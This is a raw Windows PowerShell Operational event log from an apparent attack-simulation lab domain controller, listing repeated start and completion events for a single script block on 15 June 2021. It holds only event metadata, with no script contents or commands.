RecordNumber=1468806
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468805
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468804
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468803
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468802
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468801
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468800
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468799
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468798
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468797
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468796
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468795
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468794
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468793
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468792
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468791
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468790
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468789
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468788
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468787
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468786
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468785
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468784
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:15 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468783
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469058
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469057
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469056
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469055
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469054
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469053
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469052
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469051
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469050
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469049
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469048
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469047
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469046
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469045
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469044
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469043
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469042
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469041
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469040
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469039
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469038
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469037
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469036
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469035
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469034
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469033
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469032
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469031
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469030
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469029
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469028
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469027
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:16 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
